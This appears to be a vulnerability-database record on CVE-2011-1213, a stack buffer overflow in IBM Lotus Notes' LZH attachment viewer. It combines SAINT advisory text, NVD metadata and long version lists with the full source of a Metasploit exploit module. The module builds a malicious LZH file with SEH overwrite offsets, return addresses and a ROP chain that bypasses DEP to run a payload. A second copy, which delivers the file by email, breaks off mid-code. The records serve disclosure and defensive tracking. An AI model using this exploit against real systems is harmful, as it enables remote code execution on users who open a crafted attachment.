Lotus Notes is the client for Lotus Domino servers.
Problem
IBM Lotus Notes File Viewer is vulnerable to remote code execution as a result of a stack buffer overflow while parsing headers of **LZH** files. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted file to the target user and enticing them to view it with the affected software.
Exploit works on IBM Lotus Notes 8.5 and requires a user to view the **LZH** attachment. A valid e-mail account must exist on the mail server and in Lotus Notes.
Platforms
Windows
{"type": "saint", "published": "2011-06-30T00:00:00", "reporter": "SAINT Corporation", "bulletinFamily": "exploit", "id": "SAINT:DBF29552A2B2831FD63B43300A740BAB", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-1213"]}, {"type": "saint", "idList": ["SAINT:65C4DB0D9DA3A4838F166CB775F21CD1", "SAINT:DA6CACC623FA712AE2036C05A990A0E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:102577"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOTUS/LOTUSNOTES_LZH", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/LOTUSNOTES_LZH"]}, {"type": "exploitdb", "idList": ["EDB-ID:17448"]}, {"type": "kaspersky", "idList": ["KLA10202"]}, {"type": "nessus", "idList": ["SYMANTEC_SYM_11-013.NASL", "NOTES_KEYVIEW_OVERFLOWS2.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:801945", "OPENVAS:1361412562310801945"]}, {"type": "symantec", "idList": ["SMNTC-1236"]}], "modified": "2019-05-29T17:19:47", "rev": 2}, "score": {"value": 8.3, "vector": "NONE", "modified": "2019-05-29T17:19:47", "rev": 2}, "vulnersScore": 8.3}, "edition": 2, "viewCount": 6, "cvelist": ["CVE-2011-1213"], "references": [], "lastseen": "2019-05-29T17:19:47", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/lotus_notes_lzh_viewer", "modified": "2011-06-30T00:00:00", "title": "IBM Lotus Notes LZH Attachment Viewer Stack Buffer Overflow", "description": "Added: 06/30/2011 \nCVE: [CVE-2011-1213](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1213>) \nBID: [48018](<http://www.securityfocus.com/bid/48018>) \nOSVDB: [72706](<http://www.osvdb.org/72706>) \n\n\n### Background\n\n[Lotus Notes](<http://www.lotus.com/notes>) is the client for Lotus Domino servers. \n\n### Problem\n\nIBM Lotus Notes File Viewer is vulnerable to remote code execution as a result of a stack buffer overflow while parsing headers of `**LZH**` files. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted file to the target user and enticing them to view it with the affected software. \n\n### Resolution\n\nApply patches as described in [IBM Bulletin 1500034](<https://www-304.ibm.com/support/docview.wss?uid=swg21500034>). \n\n### References\n\n<http://secunia.com/advisories/44624/> \n\n\n### Limitations\n\nExploit works on IBM Lotus Notes 8.5 and requires a user to view the `**LZH**` attachment. A valid e-mail account must exist on the mail server and in Lotus Notes. \n\n### Platforms\n\nWindows \n \n\n", "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:51:00", "description": "Integer underflow in lzhsr.dll in Autonomy KeyView, as used in IBM Lotus Notes before 8.5.2 FP3, allows remote attackers to execute arbitrary code via a crafted header in a .lzh attachment that triggers a stack-based buffer overflow, aka SPR PRAD88MJ2W.", "edition": 6, "cvss3": {}, "published": "2011-05-31T20:55:00", "title": "CVE-2011-1213", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1213"], "modified": "2017-09-19T01:32:00", "cpe": ["cpe:/a:ibm:lotus_notes:7.0.2.3", "cpe:/a:ibm:lotus_notes:5.0.1c", "cpe:/a:ibm:lotus_notes:8.5.1", "cpe:/a:ibm:lotus_notes:5.0.1a", "cpe:/a:ibm:lotus_notes:7.0.4", "cpe:/a:ibm:lotus_notes:5.0.11", "cpe:/a:ibm:lotus_notes:4.5", "cpe:/a:ibm:lotus_notes:6.5.4", "cpe:/a:ibm:lotus_notes:6.5.5.2", "cpe:/a:ibm:lotus_notes:6.0.1", "cpe:/a:ibm:lotus_notes:6.5.6.3", "cpe:/a:ibm:lotus_notes:8.5.0.1", "cpe:/a:ibm:lotus_notes:5.0.12", "cpe:/a:ibm:lotus_notes:7.0.2.2", "cpe:/a:ibm:lotus_notes:5.0.9a", "cpe:/a:ibm:lotus_notes:4.6.7a", "cpe:/a:ibm:lotus_notes:8.0.2.6", "cpe:/a:ibm:lotus_notes:8.0.2.0", "cpe:/a:ibm:lotus_notes:5.0.2c", "cpe:/a:ibm:lotus_notes:5.0.6", "cpe:/a:ibm:lotus_notes:6.5", "cpe:/a:ibm:lotus_notes:5.0.2b", "cpe:/a:ibm:lotus_notes:6.5.2", "cpe:/a:ibm:lotus_notes:5.0.4a", "cpe:/a:ibm:lotus_notes:8.5", "cpe:/a:ibm:lotus_notes:8.5.1.4", "cpe:/a:ibm:lotus_notes:3.0", "cpe:/a:ibm:lotus_notes:6.5.6.2", "cpe:/a:ibm:lotus_notes:5.0.5.01", "cpe:/a:ibm:lotus_notes:5.0.7", "cpe:/a:ibm:lotus_notes:8.5.2.2", "cpe:/a:ibm:lotus_notes:7.0.3.1", "cpe:/a:ibm:lotus_notes:8.0", "cpe:/a:ibm:lotus_notes:5.0.8", "cpe:/a:ibm:lotus_notes:8.5.2.1", "cpe:/a:ibm:lotus_notes:7.0.4.1", "cpe:/a:ibm:lotus_notes:5.0.2a", "cpe:/a:ibm:lotus_notes:6.0.5", "cpe:/a:ibm:lotus_notes:6.0.3", "cpe:/a:ibm:lotus_notes:3.0.0.1", "cpe:/a:ibm:lotus_notes:7.0.2.1", "cpe:/a:ibm:lotus_notes:8.5.1.3", "cpe:/a:ibm:lotus_notes:7.0", "cpe:/a:ibm:lotus_notes:8.0.2.3", "cpe:/a:ibm:lotus_notes:5.0.1", "cpe:/a:ibm:lotus_notes:6.5.6.1", "cpe:/a:ibm:lotus_notes:6.5.5.1", "cpe:/a:ibm:lotus_notes:7.0.0", "cpe:/a:ibm:lotus_notes:8.0.2.4", "cpe:/a:ibm:lotus_notes:6.5.1", "cpe:/a:ibm:lotus_notes:6.5.4.1", "cpe:/a:ibm:lotus_notes:7.0.3", "cpe:/a:ibm:lotus_notes:4.2.2", "cpe:/a:ibm:lotus_notes:4.6", "cpe:/a:ibm:lotus_notes:6.5.4.2", "cpe:/a:ibm:lotus_notes:7.0.4.0", "cpe:/a:ibm:lotus_notes:8.0.2", "cpe:/a:ibm:lotus_notes:6.5.5", "cpe:/a:ibm:lotus_notes:8.5.2.0", "cpe:/a:ibm:lotus_notes:5.0.9", "cpe:/a:ibm:lotus_notes:6.5.3.1", "cpe:/a:ibm:lotus_notes:6.0.4", "cpe:/a:ibm:lotus_notes:6.5.5.3", "cpe:/a:ibm:lotus_notes:5.0a", "cpe:/a:ibm:lotus_notes:5.0.1b", "cpe:/a:ibm:lotus_notes:5.0.3", "cpe:/a:ibm:lotus_notes:6.0", "cpe:/a:ibm:lotus_notes:8.0.2.1", "cpe:/a:ibm:lotus_notes:8.5.1.1", "cpe:/a:ibm:lotus_notes:5.0.2", "cpe:/a:ibm:lotus_notes:4.2", "cpe:/a:ibm:lotus_notes:8.5.1.5", "cpe:/a:ibm:lotus_notes:3.0.0.2", "cpe:/a:ibm:lotus_notes:8.0.0", "cpe:/a:ibm:lotus_notes:8.0.1", "cpe:/a:ibm:lotus_notes:7.0.2", "cpe:/a:ibm:lotus_notes:8.5.1.0", "cpe:/a:ibm:lotus_notes:6.5.6", "cpe:/a:ibm:lotus_notes:7.0.1", "cpe:/a:ibm:lotus_notes:5.0.5.02", "cpe:/a:ibm:lotus_notes:5.0.6a", "cpe:/a:ibm:lotus_notes:5.0.7a", "cpe:/a:ibm:lotus_notes:5.0", "cpe:/a:ibm:lotus_notes:6.0.2", "cpe:/a:ibm:lotus_notes:8.5.1.2", "cpe:/a:ibm:lotus_notes:5.02", "cpe:/a:ibm:lotus_notes:4.2.1", "cpe:/a:ibm:lotus_notes:7.0.1.1", "cpe:/a:ibm:lotus_notes:6.5.3", "cpe:/a:ibm:lotus_notes:5.0.1.02", "cpe:/a:ibm:lotus_notes:5.0.4", "cpe:/a:ibm:lotus_notes:5.0.10", "cpe:/a:ibm:lotus_notes:6.5.4.3", "cpe:/a:ibm:lotus_notes:6.0.2.2", "cpe:/a:ibm:lotus_notes:8.5.0.0", "cpe:/a:ibm:lotus_notes:5.0.5", "cpe:/a:ibm:lotus_notes:4.6.7h", "cpe:/a:ibm:lotus_notes:8.0.2.5", "cpe:/a:ibm:lotus_notes:7.0.4.2", "cpe:/a:ibm:lotus_notes:8.0.2.2", "cpe:/a:ibm:lotus_notes:5.0.6a.01"], "id": "CVE-2011-1213", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1213", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:ibm:lotus_notes:6.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.1.02:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.5.02:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.1:cf2:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.2a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.1b:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.1a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.9a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.2:cf1:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.7a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.2c:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:3.0.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.02:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.1:cf1:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.6a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.2:cf2:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.1c:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.2b:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:3.0.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.1:cf3:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.6.7h:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.6a.01:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.6.7a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.4a:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:6.5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:8.5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:5.0.5.01:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:lotus_notes:7.0.1.1:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:23:52", "description": "", "published": "2011-06-25T00:00:00", "type": "packetstorm", "title": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview ", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1213"], "modified": "2011-06-25T00:00:00", "id": "PACKETSTORM:102577", "href": "https://packetstormsecurity.com/files/102577/Lotus-Notes-8.0.x-8.5.2-FP2-Autonomy-Keyview.html", "sourceData": "`## \n# $Id: lotusnotes_lzh.rb 13015 2011-06-23 15:43:54Z bannedit $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview(.lzh attachment)', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in Lotus Notes 8.5.2 when \nparsing a malformed, specially crafted LZH file. This vulnerability was \ndiscovered binaryhouse.net \n \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'binaryhouse.net', # original discovery \n'alino <26alino@gmail.com>', # Metasploit module \n], \n'Version' => '$Revision: 13015 $', \n'References' => \n[ \n['CVE', '2011-1213'], \n['OSVDB', '72706'], \n['BID', '48018'], \n['URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904'], \n['URL', 'http://www.ibm.com/support/docview.wss?uid=swg21500034'], \n], \n'Stance' => Msf::Exploit::Stance::Passive, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Platform' => ['win'], \n'Targets' => \n[ \n[ 'Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal', \n{ \n'Offset' => 6741, \n'Ret' => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll \n} \n], \n \n[ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP', \n{ \n'Offset' => 6745, \n'Ret' => 0x60dc1043 # ADD ESP,52C; XOR EAX,EAX; POP EDI; POP ESI; POP EBX; POP EBP; RETN 4 nnotes.dll \n} \n], \n], \n'DisclosureDate' => 'May 24 2011', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.lzh']), \n], self.class) \nend \n \ndef exploit \n \nheader = \"\\x08\" # Size of archived file header <-- 8 - 13 = FFFFFFF6 \nheader << \"\\x1a\" # 1 byte Header checksum \nheader << \"-lh0-\" # Method ID (No compression) \nheader << \"\\x7c\\x1a\\x00\\x00\" # Compressed file size \nheader << \"\\x7c\\x1a\\x00\\x00\" # Uncompressed file size \nheader << \"\\xB2\\x5e\\xab\\x3c\" # Original file date/time \nheader << \"\\x20\" # File attribute \nheader << \"\\x00\" # Level identifier \nheader << \"\\x07\" # File name length \nheader << \"poc.txt\" # File name \nheader << \"\\x25\\x7d\" # 16 bit CRC of the uncompressed file \n \nlzh = header \nlzh << rand_text(target['Offset']) \n \nif (target == targets[0]) \n \nlzh << generate_seh_record(target.ret) \nlzh << make_nops(8) \nlzh << payload.encoded \n \nelsif (target == targets[1]) \n \nrop_nop = [0x7c3c5958].pack('V') * 47 # RETN MSVCP71.dll \n \nrop_gadgets = \n[ \n0x60524404, # POP EAX; RETN nnotes.dll \n0x7c37a140, # VirtualProtect() \n0x7c3a4000, # MOV EAX,DWORD PTR DS:[EAX]; RETN MSVCP71.dll \n0x603c53c1, # MOV ESI,EAX; RETN nnotes.dll \n0x60620001, # POP EBP; RETN nnotes.dll \n0x7c3c5946, # PUSH ESP; RETN MSVCP71.dll \n0x7c34280f, # POP EBX; RETN MSVCR71.dll \n0x00001954, # dwSize \n0x780ea001, # POP ECX; RETN MSVCP60.dll \n0x7c38b000, # lpflOldProtect \n0x60e73200, # POP EDI; RETN nnotes.dll \n0x60e73201, # RETN nnotes.dll \n0x601d5f02, # POP EDX; RETN nnotes.dll \n0x00000040, # flNewProtect \n0x60524404, # POP EAX; RETN nnotes.dll \n0x90909090, # NOP \n0x60820801, # PUSHAD; RETN nnotes.dll \n].pack(\"V*\") \n \nlzh << [target.ret].pack('V') \nlzh[32, rop_nop.length] = rop_nop \nlzh[220, rop_gadgets.length] = rop_gadgets \nlzh[289, payload.encoded.length] = payload.encoded \nend \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \nfile_create(lzh) \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102577/windows-fileformat-lotusnotes_lzh.rb.txt"}], "saint": [{"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1213"], "description": "Added: 06/30/2011 \nCVE: [CVE-2011-1213](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1213>) \nBID: [48018](<http://www.securityfocus.com/bid/48018>) \nOSVDB: [72706](<http://www.osvdb.org/72706>) \n\n\n### Background\n\n[Lotus Notes](<http://www.lotus.com/notes>) is the client for Lotus Domino servers. \n\n### Problem\n\nIBM Lotus Notes File Viewer is vulnerable to remote code execution as a result of a stack buffer overflow while parsing headers of `**LZH**` files. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted file to the target user and enticing them to view it with the affected software. \n\n### Resolution\n\nApply patches as described in [IBM Bulletin 1500034](<https://www-304.ibm.com/support/docview.wss?uid=swg21500034>). \n\n### References\n\n<http://secunia.com/advisories/44624/> \n\n\n### Limitations\n\nExploit works on IBM Lotus Notes 8.5 and requires a user to view the `**LZH**` attachment. A valid e-mail account must exist on the mail server and in Lotus Notes. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2011-06-30T00:00:00", "published": "2011-06-30T00:00:00", "id": "SAINT:65C4DB0D9DA3A4838F166CB775F21CD1", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/lotus_notes_lzh_viewer", "title": "IBM Lotus Notes LZH Attachment Viewer Stack Buffer Overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:55", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1213"], "description": "Added: 06/30/2011 \nCVE: [CVE-2011-1213](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1213>) \nBID: [48018](<http://www.securityfocus.com/bid/48018>) \nOSVDB: [72706](<http://www.osvdb.org/72706>) \n\n\n### Background\n\n[Lotus Notes](<http://www.lotus.com/notes>) is the client for Lotus Domino servers. \n\n### Problem\n\nIBM Lotus Notes File Viewer is vulnerable to remote code execution as a result of a stack buffer overflow while parsing headers of `**LZH**` files. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted file to the target user and enticing them to view it with the affected software. \n\n### Resolution\n\nApply patches as described in [IBM Bulletin 1500034](<https://www-304.ibm.com/support/docview.wss?uid=swg21500034>). \n\n### References\n\n<http://secunia.com/advisories/44624/> \n\n\n### Limitations\n\nExploit works on IBM Lotus Notes 8.5 and requires a user to view the `**LZH**` attachment. A valid e-mail account must exist on the mail server and in Lotus Notes. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2011-06-30T00:00:00", "published": "2011-06-30T00:00:00", "id": "SAINT:DA6CACC623FA712AE2036C05A990A0E7", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/lotus_notes_lzh_viewer", "type": "saint", "title": "IBM Lotus Notes LZH Attachment Viewer Stack Buffer Overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T07:52:59", "description": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview(.lzh attachment). CVE-2011-1213. Remote exploit for windows platform", "published": "2011-06-23T00:00:00", "type": "exploitdb", "title": "Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview .lzh attachment", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1213"], "modified": "2011-06-23T00:00:00", "id": "EDB-ID:17448", "href": "https://www.exploit-db.com/exploits/17448/", "sourceData": "##\r\n# $Id: lotusnotes_lzh.rb 13015 2011-06-23 15:43:54Z bannedit $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ManualRanking # needs client interaction and permanent listener\r\n\r\n\t#\r\n\t# This module sends email messages via smtp\r\n\t#\r\n\tinclude Msf::Exploit::Remote::SMTPDeliver\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview(.lzh attachment)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in Lotus Notes 8.5.2 when\r\n\t\t\t\tparsing a malformed, specially crafted LZH file. This vulnerability was\r\n\t\t\t\tdiscovered binaryhouse.net\r\n\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'binaryhouse.net',\t\t# original discovery\r\n\t\t\t\t\t'alino <26alino@gmail.com>',\t# Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 13015 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-1213'],\r\n\t\t\t\t\t['OSVDB', '72706'],\r\n\t\t\t\t\t['BID', '48018'],\r\n\t\t\t\t\t['URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904'],\r\n\t\t\t\t\t['URL', 'http://www.ibm.com/support/docview.wss?uid=swg21500034'],\r\n\t\t\t\t],\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Passive,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Platform' => ['win'],\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Lotus Notes 8.0.x - 8.5.2 FP2 / Windows Universal',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 6741,\r\n\t\t\t\t\t\t\t'Ret' => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t\r\n\t\t\t\t\t[ 'Lotus Notes 8.5.2 FP2 / Windows Universal / 